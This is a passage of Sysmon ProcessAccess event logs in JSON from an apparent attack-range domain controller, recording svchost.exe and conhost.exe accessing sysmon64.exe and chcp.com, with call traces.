C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4893,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4894,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4895,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4896,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4897,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4898,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4899,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.471","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4900,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.471\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010D7BD0700}\r\nTargetProcessId: 3152\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 